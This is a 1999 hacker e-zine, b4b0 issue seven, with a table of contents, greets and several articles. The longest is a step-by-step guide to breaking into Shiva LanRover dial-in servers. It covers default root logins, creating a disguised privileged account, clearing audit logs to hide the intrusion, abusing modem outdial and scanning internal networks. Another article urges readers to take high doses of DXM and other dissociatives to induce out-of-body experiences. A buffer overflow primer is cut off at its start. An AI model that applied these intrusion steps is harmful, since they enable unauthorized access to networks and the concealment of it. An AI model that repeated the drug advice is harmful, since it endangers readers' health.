Copy Link
Add to Bookmark
Report
B4b0 07
[ from the unexplored areas of the human brain comes.. ]
_________ ______ _________ _________
/\ ___ \ /| \ /\ ___ \ /\ ___ \
/ \ \ /\ \ | | |\ \ / \ \ /\ \ / \ \ /\ \
\ \ \__\ \ | | |_\ \__\ \ \__\ \\ \ \ \ \
\ \ < | | \\ \ < \ \ \ \ \
\ \ ___ `\ |/\_____ _\\ \ ___ `\\ \ \ \ \
\ \ \ /\ \ / / \ \ \ \ \ /\ \\ \ \ \ \
\ \ \__\ \\/____ \ \ \ \ \__\ \\ \ \__\ \
\ \________\ \ \____\ \ \________\\ \________\
\ / / \ / / \ / / \ / /
\/________/ \/____/ \/________/ \/________/
s e v e n
the experience of new ideas and obtuse perspective
[b4b0 inc. (c) 1999 all rights reserved]
[ disrupting the classes of school teachers ]
[ around the world. ]
[ this zine is best viewed in vi ]
[TABLE OF CONTENTS]
(00). Greets, Hellos, Staff, What not.
(01). Introduction - by ph1x *y0r elite edit0r* (heed my advice)
(02). Hacking Shiva-Lan-Rover-Servers - [Hybrid]
(03). How to have an out of body experience - [ph1x]
(04). Womper language interpretor - [chrak]
(06). Buffer overflow exploitation - [ph1x]
(07). The stupidity that lies in credit fraud - [KKR]
(08). Screwing around with /dev/audio - [ph1x]
(09). My day in age(Firewall, a magic bullet?) - [rhinestone]
(10). d0x (For your harrassing enjoyment) - [pG]
(11). Coding a shell from the ground up - [ph1x]
(12). The art of writing shell code - [smiler]
(13). The telephone system/network part 1 - [pabell]
(14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler]
(15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x]
(16). IRC lawgz, cybersex erotica - [b4b0]
(17). Revolution against the catholic church - [schemerz]
(18). bsaver.c overview - [cp4kt]
(19). Conclusion - [ph1x]
Additional pieces included in this issue of b4b0 are...
[ bouncer.c ] ----------> /juarez/bouncer.c | intruderx
[ Encrypt.c ] ----------> /juarez/encrypt.c | tragen
[ GHCgi.c ] ------------> /juarez/Cgi.c | FreD
[ Carp.c ] ----------> /juarez/carp.c | comp4ct
[ Scanned dialups ] ----> /juarez/carriers | comp4ct
[ FreeBSD rootkit ] ----> /juarez/fsd.gz | icesk
[ b4b0 screensaver ] ---> /juarez/bsaver.c | cp4kt/qytpo
[ el8 .zip of misc ] ---> /juarez/misc.zip | milcrat
. -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- -
|
| ph1x ----------- -----> the chosen one
: jsb4ch ---- --- -------> the undecided one
. t1p ------- --------> acclaimed b4b0 adm1n
gr1p ----- -- - -------> he whos accent slays
. j\ ------ -- ---- -----> the freezing wonder
chr4k ----- ------ ----> the one who operates with a blown mind
comp4ct --- ------ ----> he whom claims to be a b4b0 saint
. p4bell ---- ------ ----> the one called the golden child
coss4ck ---------------> the one of proclamation
sm1ler ----------------> he who is emotionally content
. -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- -
|
| icesk emf zayten
: pG schemerz
Hybrid assem
. Qytpo e-
rhinestone samj
jnz polder
.
--- Official IRC channel -> efnet / #b4b0
--- most idiotic site ever -> www.anticode.com
--- irc chick of the month -> MostHated
--- greets to -> #!animalcrackers, rhino9, samjs mom, duke,
horizon, LJ & Falon, HNN, those who
know who they are that have helped us and that
we forgot about *sorry*, chixy + miah of the
netcis crew (some of us started there!), the
trench coat mafia, the NRA
--- homosexual -> so1o (its good you came out of the closet)
--- fuck yous -> DigiEbola, silitek (as always), those who live
their lives around 'taking irc channels', and
people who molest their children (u siq fuqz)
--- note -> just because you have a southern accent and
hate jews doesn't mean you don't have to pay
your taxes.
--- interesting fact -> the now irc fad of saying "HEH" was invented
in #b4b0. so we must require you to say the
following when using HEH :
<somenick> HEH (c) b4b0 1999
--- P.S. -> we need more supporters who will write things
for us other than inetd backdoors. submit your
article/code/remarks submissions@b4b0.org
- -- ---> the bandz <--- -- -
lo fidelity all stars, rage against the machine, the chemical brothers, the
crystal method, misfits, minor threat, the decepticonz, danzig, and much, much
much more!
- -- ---> interesting <--- -- -
-- -- > www.babo.com - best gossip in korea!
-- -- > www.babo.net - aleman?
-- -- > trench coat mafia - bang.
-- -- > vandalisation of body - s4d1zm
-- -- > british association of balloon operators (babo) - fear that.
-------------------------------------------------------------------------------
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
-------------------------------------------------------------------------------
Greatest movie of all time, "Gummo". ---->
I walked into the fruit market today, the clerk thought I was some out of
town hick. "Those apples will be 2 dollars a piece." He tells me. This is
where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing
me a dollar change, I say.. "keep it, were even." On the way out, I stepped
on a grape.
******************************************************************************
[INTRODUCTION]
******************************************************************************
y0y0y0 We have had several people who have taken charge
as editor for this issue, but have not followed through with there
responsibilities. Therefore, me(ph1x) the unreliable drug addict has been
chosen to get all of the submissions together and put together a nice
issue with good quality reading material. I have miraculously managed to
do so, so read to your hearts desire, and enjoy this issue. HEH!.
PS. I apologize for the extreme lateness of this issue, its just
that jsbach *cough* I mean.. various people said they were
going to write articles, and never did. =)
MISC:
QUOTE: <kwan> you are the maker of youre
own destiny(Kwan = Gemmi) <-- These words inspired me.
<gezus> Real hackers drink chocolate milk!
b4b0 site of the month: http://www.frognet.net/dxm <- CHECK IT OUT!
L3tz giaT diZ sm4ck g01nG!@#$
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Hacking the Shiva-LAN-Rover System
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
By Hybrid (th0rn@coldmail.com)
April 1999
Contents:
1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP
1. Introduction
Shiva systems are becoming increasingly popular in the LAN networking world.
If like me you have done quite alot of scanning you would have come accross a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to fokus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in it's own right, in
the sense that once you have gained access to one of these platforms, you
have the opotunity to explore the entire network on which the system is
based, in essance, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.
To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:
@ Userid:
or if Radius authentification is enabled:
Starting Radius Authentification....
@ Userid:
Blah, ignore the radius authentification thing for now, it's just a lame
attempt to make the system look as if it has been secured, in most cases the
sysamin would have missconfigured the authentification and you will be
supprised as to how easy it is to get in. So you are at the login prompt,
what next? - As in most OS's Shivas have a nice set of default logins, so the
sysadmins poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
The root login will work 9 times out of 10. The reason that the root account
works alot is beacuse in some cases the admin is not even aware the account
even exists! Most of the system setup is done via the main terminal, so the
admin does'nt have to login. the root account is not listed in the userfile
database, so most admin's overlook it. In some cases the admin would have set
up there own acount with somthing like <admin> <password> but if the admin
has any common sense you will not get in with that. Like most OS's, Shiva
systems have an audit log, so don't sit there trying to brute force anything,
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've loged on as <root> <no password>, now what? -
read on.
Once loged in, you will be droped into the Shiva command line prompt, which
should look somthing like this:
Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva)
ShivaLanRover/8E# (The command prompt. Can be configured to say anything)
To get a list of the available commands type <help> or <?> this will reveal a
menu similar to this:
ShivaLanRover/8E# ? <enter>
alert Send text alert to all dial-in users
busy-out line <number> Busy-out serial line modem
clear <keyword> Reset part of the system
comment Enter a comment into the log
configure Enter a configuration session
connect <port pool> Connect to a shared serial port
crashdump Write crashblock to log
disable Disable privileges
help List of available commands
initialize <keyword> Reinitialize part of the system
lan-to-lan <keyword> Manage LAN-to-LAN connections
passwd Change password
ping <IP host> Send ICMP echo to IP host
ppp Start a PPP session
quit Quit from shell
reboot Schedule reboot
show <keyword> Information commands, type "show ?" for list
slip Start a SLIP session
telnet <IP host> Start a Telnet session
testline Test a line
The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:
ShivaLanRover/8E# show users <enter>
Line User Activity Idle/Limit Up/Limit
1 jsmith PPP 0/ 10 0/ None
2 root shell 0/ 10 0/ None
Total users: 2
So here we see ourselves loged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dialin
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, ie- check the admin is not loged in. Now you need to
get a rough idea of the size of the system and it's network. At the # prompt
type:
ShivaLanRover/8E# show lines <enter>
Async Lines:
Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0
3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0
6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
Here we see a list of the modem ports, as you can see it has 8, this is about
average for most Shiva systems. So now we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is, to do
this type:
ShivaLanRover/8E# show arp <enter>
Protocol Address Age Hardware Addr Type Interface
Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP
Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP
Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP
Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP
Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP
Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP
Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP
Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP
Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP
Showing the arp cache reveals some of the connected boxes to the LAN, aswell
as ethernet address, and type of protocol. Now we have established the kind
of system we are on, it's time to do some exploring, which is where I shall
begin this text file.
2. What can Shiva lan rovers do?
Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:
PPP (point-to-point protocol) This is the key to gaining access to the
network on which the Shiva is based upon, in most cases the network will have
an internal DNS server, and if you are lucky, the network which the system is
based will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.
Modem Outdial. In alot of cases the system would have been configured to
allow modem outdialing which can be good for calling BBS's, diverting to
other dialups, scanning, but again, this is lame, just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.
Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.
It's time to go into detail about all of the Shivas functions and commands, I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to.
3. The command line
When loged into the Shiva shell, you have the following commands at your
disposal:
alert (Send text alert to all dial-in users) - Self explanitory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)
The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc.. to do this all you need to do is type <clear log> This
will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc, but these will
all cause system problems and get you noticed, best leave this alone for the
time being.
comment (Enter a comment into the log)
configure (Enter a configuration session)
Heres the part where you can get the system to do what you want it to do, ie-
to get a PPP connection you will need to set up another account with shell
and PPP privalages. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account, using the config command you can create a new
user account with greater privalges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system, you don't want to make an account that will stick out from the other
accounts, so type:
show security <enter> (this gives a list of the security configuration and
the user list.) you should see somthing like this:
[UserOptions]
PWAttempts=0
ARARoamingDelimiter=@
ExpireDays=30
GraceLogins=6
[Users]
admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052
Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one aswell. The idea is to make an account
that will blend in with the others and not look to obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc, more
on these functions in a bit. OK, now we need to set up our own account, to do
this we need to enter a configuration session, at the command line prompt
type: ShivaLanRover/8E# config <enter>
You will then drop into the configuration session.
Enter configuration file lines. Edit using:
^X, ^U clear line
^H, DEL delete one character
^W delete one word
^R retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.
config> (here is where you enter the config commands, to make you own account
do the follwing)
config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)
Review configuration changes [y/n]? y
New configuration parameters:
[users]
username=/di/do/sh/tp/pw
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.
You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password, you can later change this. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to
alter anything. Now your account has been set up, all you do is re-connect to
the system and login as your username, more on this later.
connect <PhoneGroup pool> (Connect to a serial port or modem)
This is another one of the good features of Shivas, you can remotely control
a series of modems on the system, and in alot of cases dialout. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter> you will then drop into
one of the modem pools, as follows:
Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.
(here basic modem commands are nessasary, use the follwing to dialout)
ATZ (initialise modem)
ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial
with be based upon the system PBX, so sometimes you will have to figure out
the outdialing code, which should be somthing simple like dialing a 9 before
the number you want to connect to. To disconnect from the outdialing session
type control C, or ^C. This will take you back to the command line. As with
the other system events, outdialing is loged into the audit file, along with
the number you called. It is generaly a good idea to clear the audit log
after things like PPP or dialout, again just type clear log <enter>.
cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privaleges)
dmc <keyword> (Information commands, type "dmc ?" for list)
down <slot> <firstmodem> (last Remove modems from CCB pool)
info <slot> <modem> (Print info for specified modem)
mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
state (Print state of a modem)
status (Print status of all modems)
trace (Trace message passing)
up <slot> <firstmodem> (lastmo Add modems to CCB pool)
test_1slot <slot> (Tests DMC card in slot specified)
test_allcards (Tests all DMC cards found in system)
test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
test_loopall <count 0-99> (Tests All DMC's for count)
test_modempair <slot1> (modem1 Tests modems against each other)
test_slotpair <slot1> <slot2> (Tests a DMC card against another)
test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)
help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)
close <nickname> (Close tunnel to L2F HG)
login (Start L2F session)
tunnels (Show open tunnels)
lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)
show+
account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)
the show config command will reveal all the system configuration setups,
includings DNS server information, security configurations, IP routing etc.
It will also show the internal IPs of radius authentification and TACAS
servers.
show+
finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)
To get an idea of the routing information, and again how big the network is
type, show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are, it is a good idea to note the IP
prefixes.
show+
lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)
The show log command will display the system audit log in more format. Here
you will be able to see what is going on on the system, ie- is it primarily
used for PPP, dialout etc. If users use the system for outdialing, you can
even see the numbers that they dial. Here is a cut down example as to what
you wiuld see in a system log file:
Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00 4534 Serial4:PPP: IPCP layer up
00:04 4535 Serial4:PPP: CCP layer up
14:09 4536 Serial4:PPP: IPCP layer down
00:00 4537 Serial4:PPP: CCP layer down
00:00 4538 Serial4:PPP: LCP layer down
00:01 4539 Serial4:PPP: CD dropped on connection
00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06 4541 Serial4: Rate 115200bps
00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01 4543 Serial4: Initialized modem
04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27 4545 Serial4: New Dial-In session
00:00 4546 Serial4:PPP: LCP layer up
00:00 4547 Serial4: "krad" logged in
00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
00:00 4549 Dialin:IPX configured net 9823O049
00:00 4550 Serial4:PPP: IPXCP layer up
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06 4673 Serial4: Rate 115200bps
00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00 4675 Serial4: Initialized modem
55:11 4676 Could not parse IP SNMP request.
In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.
show+
modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)
slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)
4. System security
Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
including Radius Authentification, SecurID, TACAS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the Radius Authentification. In this case, the setup would look somthing like
this.
[RADIUS Authentification Server] } The server contains a secured user
| list, which will be used to verify
| login requests. The login is
[Router] determined if the user can be
| | verified by the server.
| | } The Shiva sends the login request to RADIUS.
[Shiva System] } Starting Radius Authentification... @ Userid:
Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the Radius server, a secondary shiva may be installed to act as the security
server, whereas all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have loged into a system, but
the above setup has been implemented. For example, say you loged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security> If
the verification server has been setup, there will be no users in the user
list, instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification srever, or primary Shiva, just use the show config command. you
can then telnet from the Shiva you are on, to the Shiva displayed in the
config file, you should then get the @ Userid: login screen again, try root
no pass, if this does not work, it is possible to temorarily configure your
own server on the network, but this would mean other users will not be able
to login, so leave this alone. If you do manage to login to the server as
root, you have to setup your user account there, because that is where all
the Shivas on the network refer to in order to verify users, this way the
admin only has to maintain one user configuration file.
5. PPP
Once you have setup a user account with shell and PPP privaleges, you can
begin exploring the network on which the Shiva is based upon. If the network
is net connected you can get free net access aswell, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network, or port scanner accross the domain which the Shiva
is on. As on most networks, you are likely to come accross a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers, in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. using
the <connect all_ports> command will give you control over the system modems,
then you can dialout as if you where in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dialup to the system directly. The mistake people make when it comes to ANI,
or CLID is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong* the ANI service can be setup by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationaly, so your origionating clid gets striped at intralata
boundarys on the PSTN. A technique, which I don't wanna give out involves
trunk and carrier hoping. We'll thats about it for this file, hope you
enjoyed it. If you want more information on the Shiva Lan Rover system, just
check out shiva.com, they will have technical guides in pdf format, you can
also download the shiva software from their ftp site.
Shouts to the following:
[9x] substance phriend siezer vectorx statd
blotter knight network specialK microdot
katkiller xramlrak bosplaya deadsoul and
nino the 9x g1mp.
[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.
[D4RKCYDE] downtime elf zomba force mortis
angel dohboy brakis alphavax
tonekilla bishopofhell sintax
digitalfokus mistress.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
[Astral Projection]
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
How to have an out of body experience. ph1x.
In this article I am going to explain what astral projection is,
and my personal method of accomplishing it.
NOTE: This method works for me while sober, and on dxm.
This method may not work everyone, and is just my
personal way of inducing OOBE.
You may or may have not heard about people leaving there physical
bodies and projecting thereselves into a higher dimension, known as the
astral plain. Beleive it or not, this strange act of phenomina is
totally real, and many people today practice methods that will eventually
lead them to disociating themselves from there physical bodies. It is
said by some that the whole sensation of leaving your body and exploring
the astral plain is a state of mind. That is definatley not true. I
myself, and many others have done experimentation. When you get up and
step out of your body you are seeing what is going on in the world just
as you would see it if you were in your physical body. You are just seeing
it from the perspective of a different dimension. The 4th dimension.
3/12/99 - I ingested 500mg of dxm(Dextramethorphan helps induce OOBE)
After the effects started coming on, I lay down in my bed. After about
15 minutes of rythmic breathing, my body was totally relaxed. I lay there
with a clear mind. My body starts viberating after about another 5 minutes.
After feeling like my chest was being crushed by some massive force I got
a tingling sensation and I could see through my eye lids. From there, I
laid a moment then lifted my arms slowly until I felt them slide out of
my physical body. I satup and staired at my lifeless looking body. And I
realized, my body is not me, it is just a shell for my soul. With that in
mind I decided that I wanted to fly to seattle for no particular reason.
After patrolling the streets of seattle where I once lived, I felt
an urge to get back to my body but wanted to stop at my ex girlfriends
house first. I sort of bounced my way up to her house by gliding through
the air. I went into her room, where we previously used to sit and smoke
pot. I saw a figure sitting in the desk chair with its back towards me.
It slowly turned around, and it was rather a grotesque looking boy with a
sort of transparent image. When he smiled, I realized that I had seen him
before at my house in seattle when I woke up one night after a horrifying
dream. I quickly flew back to my body, through blurs of colors and over
trees and buildings. As I laid in my body, I felt like I couldnt get back
in alignment. I started to get sorta freaked out but after a few minutes
of struggling I managed to regain contact with my physical parts.
True story? Of course.
If you would like to try something like this, I am giving you my personal
method in having out of body experiences. Expect this to take some practice
and time. If you are willing to take dxm to help induce an OOBE, then great.
It makes it 10 times easier.
First lay down, on the floor or on your bed. Your head and feet should
be even. Meaning you shouldnt be laying on a pillow or anything. Next
with your hands at your sides, start out with rythmic breathing. Like so:
Breath in for 2 seconds The whole time you are doing this rythmic
Breath out for 4 seconds breathing, you should be letting yourself
Breath in for 2 seconds get totally relaxed. Don't worry about
Breath out for 4 seconds dozing off or entering a sleep state,
Breath in for 2 seconds because that in itself could help you
Breath out for 4 seconds leave your body. One of the main theories
Breath in for 3 seconds behind astral projection is that you are
Breath out for 6 seconds in a sleeping state while still being
Breath in for 3 seconds in a conscious type state of mind.
Breath out for 6 seconds On one occasion, I felt that I had fallen
Breath in for 3 seconds asleep. Then I woke up, and stood up out
Breath out for 6 seconds of bed. A second later I realized it was
Breath in for 4 seconds a totally false awakening because I saw my
Breath out for 8 seconds physical body laying there on my bed limp
Breath in for 4 seconds and breathing. Another thing, as you are
Breath out for 8 seconds doing this try to maybe breathe in a way
Breath in for 4 seconds that you are breathing in correspondance
Breath out for 8 seconds to your hearts rythm. For example, you
feel your heart beat, then you breathe in
for two seconds, you hear it beat again, then
you breathe out for four seconds. Just experiment
with it, and find your own technique in getting
really relaxed.
Repeat this method until every
muscle in your body is relaxed to its fullest.
After this, try to have a totally clear mind. Think about absolutely
nothing. Concentrate only on your feet until they start to feel like
they are floating. Move up to your hips and concentrate in the same
manner. By now, you should start feeling powerful viberations throughout
your body, like your being electricuted. You may even feel pain. But
that is one of the things you will have to learn, trust that you will be
ok. Don't back down, it is all a state of mind. After much viberations
you may be able to see through your eye lids. This means you have
succeeded. From here, picture yourself rising out of your body.
And you may just find yourself sitting up and exiting your physical shell.
You may say "What a huge crock of shit, leaving your body could not
possibly be so easy." Yes, this method is fairly simple, but it takes much
practice for your average person. It personally took myself several months
to start getting anywhere in the experience after I reached the viberations.
But after you get your first OOBE, there are many more to come. If you
want to experience an OOBE possibly your first try, as I said before..
disociatives, like kentamine, pcp help induce them. But most noteably
dxm (dextramethorphan). Check out http://www.frognet.net/~dxm for the
dxm FAQ, or http://www.alaska.net/~zorak/dxm if you would like the download
an issue of the dxm magazine.
Conclusion,
Hopefully this article gave you a little bit of insight as to what
astral projection is all about. If you would like to furthur your knowledge
in the area, search for "OOBE", "astral projection" etc. On a search engine.
Or go to the library and check out a book on the subject. eg.
"Leave your body in 21 days". Also http://www.winternet.com/~rsp/obebook.html
is a good book by Robert Peterson on how to have OOBE, and its online
in HTML! I hope you enjoyed the article =)
ph1x@b4b0.org
--------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!> Womper Language Interpretor, by chrak <b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------------
This is a neat language interepor by chrak, that is still in developement.
Check out /w0mper, and make sure to read Example.sh to see a set of example
code.
* NOTE * this isn't quite finished and hopefully chrak will come through
with more releases. Thank you.
----------------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> Buffer overflow exploitation, by ph1x <b4b0!b4b0!b4b0!b4b0!b4b0!>
----------------------------------------------------------------------------------------
Buffer overflow exploitation.
NOTE: This article does not explain how to write buffer overflows,
but rather explains how they are taken advantage of.
Ok, there have already been several articles released on buffer overflows
and how they are taken advantage of. I talk to people on IRC every day
who claim to have skillz, yet beleive it or not many of them do not have
the slightest idea as to what a buffer overflow is, how they work, and
how they are exploited. I'm going to give a brief introduction to them
in this article, and im hoping that you will have a much better
understanding of buffer overflows after going over this. I have a feeling
that many people find aleph1's article to complex to understand, so I will
try to put the concept of buffer overflows into your head with basic idea's.
__________________________
|What is a buffer overflow?|
A buffer overflow is just what it sounds like. Merely overflowing a buffer,
with more data than it can hold. In doing so, you can change the execution
of instruction by overwriting the return address on the stack.
